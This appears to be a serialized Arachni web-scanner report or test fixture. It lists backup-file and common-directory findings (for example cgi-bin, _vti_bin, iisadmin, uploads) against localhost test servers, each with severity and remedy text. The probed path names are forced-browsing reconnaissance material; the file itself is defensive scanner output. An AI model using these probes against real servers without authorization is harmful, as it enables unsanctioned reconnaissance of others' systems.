mod_name: Backup files variations: - !ruby/object:Arachni::Issue verification: false references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml opts: :regexp: '' url: http://localhost:8405/some_filename.php.copy injected: some_filename.php.copy id: some_filename.php.copy elem: path remarks: {} method: '' response: some_filename.php.copy headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MjI= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMCBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
mod_name: Backup files variations: [] internal_modname: BackupFiles internal_modname: BackupFiles - !ruby/object:Arachni::Issue verification: false references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml url: http://localhost:8405/some_filename.copy elem: path method: '' name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
mod_name: Backup files variations: - !ruby/object:Arachni::Issue verification: false references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml opts: :regexp: '' url: http://localhost:8405/some_filename.copy injected: some_filename.copy id: some_filename.copy elem: path remarks: {} method: '' response: some_filename.copy headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTg= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMCBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
mod_name: Backup files variations: [] internal_modname: BackupFiles internal_modname: BackupFiles - !ruby/object:Arachni::Issue verification: false references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml url: http://localhost:8405/Copy%20of%20some_filename.php elem: path method: '' name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
mod_name: Backup files variations: - !ruby/object:Arachni::Issue verification: false references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml opts: :regexp: '' url: http://localhost:8405/Copy%20of%20some_filename.php injected: Copy%20of%20some_filename.php id: Copy%20of%20some_filename.php elem: path remarks: {} method: '' response: Copy%20of%20some_filename.php headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Mjk= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMCBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
mod_name: Backup files variations: [] internal_modname: BackupFiles internal_modname: BackupFiles - !ruby/object:Arachni::Issue verification: false references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml url: http://localhost:8405/Copy%20of%20some_filename elem: path method: '' name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
mod_name: Backup files variations: - !ruby/object:Arachni::Issue verification: false references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml opts: :regexp: '' url: http://localhost:8405/Copy%20of%20some_filename injected: Copy%20of%20some_filename id: Copy%20of%20some_filename elem: path remarks: {} method: '' response: Copy%20of%20some_filename headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MjU= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMCBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
mod_name: Backup files variations: [] internal_modname: BackupFiles internal_modname: BackupFiles - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/_private/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/_private/ injected: _private id: _private elem: path remarks: {} method: '' response: _private headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- OA== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMiBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/_vti_bin/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/_vti_bin/ injected: _vti_bin id: _vti_bin elem: path remarks: {} method: '' response: _vti_bin headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- OA== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMiBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/cgi-sys/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/cgi-sys/ injected: cgi-sys id: cgi-sys elem: path remarks: {} method: '' response: cgi-sys headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Nw== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMiBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/cgi-bin/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/cgi-bin/ injected: cgi-bin id: cgi-bin elem: path remarks: {} method: '' response: cgi-bin headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Nw== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMiBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/mailman/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/mailman/ injected: mailman id: mailman elem: path remarks: {} method: '' response: mailman headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Nw== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMiBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/iishelp/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/iishelp/ injected: iishelp id: iishelp elem: path remarks: {} method: '' response: iishelp headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Nw== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMiBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/iisadmin/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/iisadmin/ injected: iisadmin id: iisadmin elem: path remarks: {} method: '' response: iisadmin headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- OA== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMiBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/uploader/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/uploader/ injected: uploader id: uploader elem: path remarks: :stuff: - Blah - Blah2 method: '' response: uploader headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- OA== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMiBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/tsweb/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/tsweb/ injected: tsweb id: tsweb elem: path remarks: {} method: '' response: tsweb headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NQ== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMiBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/uploads/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/uploads/ injected: uploads id: uploads elem: path remarks: {} method: '' response: uploads headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Nw== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/default/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/default/ injected: default id: default elem: path remarks: {} method: '' response: default headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Nw== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMiBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
